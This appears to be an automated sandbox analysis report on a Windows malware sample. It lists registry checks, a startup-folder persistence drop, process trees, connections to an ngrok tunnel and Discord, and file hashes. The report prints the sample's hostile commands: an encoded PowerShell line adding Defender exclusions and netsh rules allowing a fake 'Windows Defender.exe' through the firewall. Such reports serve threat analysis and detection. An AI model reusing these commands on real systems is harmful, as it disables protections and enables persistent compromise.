| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip4.seeip.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\output.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe
"C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAbAB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAdQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAaQB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAbABjACMAPgA="
C:\Users\Admin\AppData\Local\Temp\output.exe
"C:\Users\Admin\AppData\Local\Temp\output.exe"
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
"C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\scam_woofer.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\mode.com
mode 80,15
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe" "Windows Defender.exe" ENABLE
C:\Windows\SysWOW64\mode.com
mode 130,30
C:\Windows\SysWOW64\netsh.exe
netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe" "Windows Defender.exe" ENABLE
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 4988 -ip 4988
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4988 -s 2036
Network
| Country | Destination | Domain | Proto |
| US | 74.125.34.46:80 | | tcp |
| US | 209.197.3.8:80 | | tcp |
| US | 8.8.8.8:53 | ip4.seeip.org | udp |
| US | 23.128.64.141:443 | ip4.seeip.org | tcp |
| US | 93.184.220.29:80 | | tcp |
| US | 20.189.173.1:443 | | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.68.171.119:13992 | 6.tcp.eu.ngrok.io | tcp |
Files
memory/4500-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\output.exe
| MD5 | 5f34fc15a6555433e91d8dc0564d2092 |
| SHA1 | dc786e4ddf9af8de8909da2489d2848dd39f762a |
| SHA256 | c35218e577fe12ad1aa6835840f5b762893aeaa7759ea39aef6ef6b15a954e8c |
| SHA512 | fb90d8cfddd514cfc196149169c64578c11433ad27d0a0efc7394eae6b7a2f458d9184b84eec730e1a1ae1c5248a6749e6f21cdad42e1387e33ba1a23766b238 |
memory/4988-136-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\output.exe
| MD5 | 5f34fc15a6555433e91d8dc0564d2092 |
| SHA1 | dc786e4ddf9af8de8909da2489d2848dd39f762a |
| SHA256 | c35218e577fe12ad1aa6835840f5b762893aeaa7759ea39aef6ef6b15a954e8c |
| SHA512 | fb90d8cfddd514cfc196149169c64578c11433ad27d0a0efc7394eae6b7a2f458d9184b84eec730e1a1ae1c5248a6749e6f21cdad42e1387e33ba1a23766b238 |
memory/4988-140-0x0000000000FC0000-0x0000000000FD0000-memory.dmp
memory/2268-139-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
| MD5 | 0c6c4a3d96c78a24d6568b83e141896e |
| SHA1 | f5fb76840cb984722f61b370fb6641fa4ad9ac7e |
| SHA256 | 73870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7 |
| SHA512 | 1700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be |
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
| MD5 | 0c6c4a3d96c78a24d6568b83e141896e |
| SHA1 | f5fb76840cb984722f61b370fb6641fa4ad9ac7e |
| SHA256 | 73870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7 |
| SHA512 | 1700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be |
memory/832-143-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\scam_woofer.bat
| MD5 | 4b4e566a986fe97ba2d89f9c64a24c64 |
| SHA1 | 18bba3d5058b4b53fc99f9fba94110f4e8f8c2ea |
| SHA256 | 2950d0e125c3d1d11be27388ca83ef5d3fbcd71e49c0ed4eb0e0373340707a97 |
| SHA512 | 32e39cbd0ba54cd1bcf25158774a44060d65bdeef9de0986be5267c3da229d8e743afaa67b98492172b7b59cd3fb0cf9e0c5dc149651a3518479ac8af677cee8 |
memory/4004-145-0x0000000000000000-mapping.dmp
memory/3668-146-0x0000000000000000-mapping.dmp
memory/4500-147-0x0000000002920000-0x0000000002956000-memory.dmp
memory/4500-148-0x00000000051D0000-0x00000000057F8000-memory.dmp
memory/4988-149-0x00007FFB3D120000-0x00007FFB3DBE1000-memory.dmp
memory/2268-150-0x0000000073B70000-0x0000000074121000-memory.dmp
memory/4452-151-0x0000000000000000-mapping.dmp
memory/4500-152-0x0000000004F70000-0x0000000004F92000-memory.dmp
memory/4500-154-0x00000000058E0000-0x0000000005946000-memory.dmp
memory/4500-153-0x0000000005870000-0x00000000058D6000-memory.dmp
memory/4500-155-0x0000000005EB0000-0x0000000005ECE000-memory.dmp
memory/2732-156-0x0000000000000000-mapping.dmp
memory/4988-157-0x00007FFB3D120000-0x00007FFB3DBE1000-memory.dmp
memory/2268-158-0x0000000073B70000-0x0000000074121000-memory.dmp
memory/4276-159-0x0000000000000000-mapping.dmp
memory/1920-160-0x0000000000000000-mapping.dmp
memory/3068-161-0x0000000000000000-mapping.dmp
memory/4580-162-0x0000000000000000-mapping.dmp
memory/1276-163-0x0000000000000000-mapping.dmp
memory/4852-165-0x0000000000000000-mapping.dmp
memory/3184-164-0x0000000000000000-mapping.dmp
memory/4500-166-0x0000000006EE0000-0x0000000006F12000-memory.dmp
memory/4500-167-0x00000000746C0000-0x000000007470C000-memory.dmp
memory/4500-168-0x00000000064C0000-0x00000000064DE000-memory.dmp
memory/4500-169-0x0000000007860000-0x0000000007EDA000-memory.dmp
memory/4500-170-0x0000000007220000-0x000000000723A000-memory.dmp
memory/4500-171-0x0000000007290000-0x000000000729A000-memory.dmp
memory/4500-172-0x00000000074B0000-0x0000000007546000-memory.dmp
memory/4988-173-0x00007FFB3D120000-0x00007FFB3DBE1000-memory.dmp
memory/4500-174-0x0000000007590000-0x000000000759E000-memory.dmp
memory/4500-175-0x00000000075E0000-0x00000000075FA000-memory.dmp
memory/4500-176-0x00000000075D0000-0x00000000075D8000-memory.dmp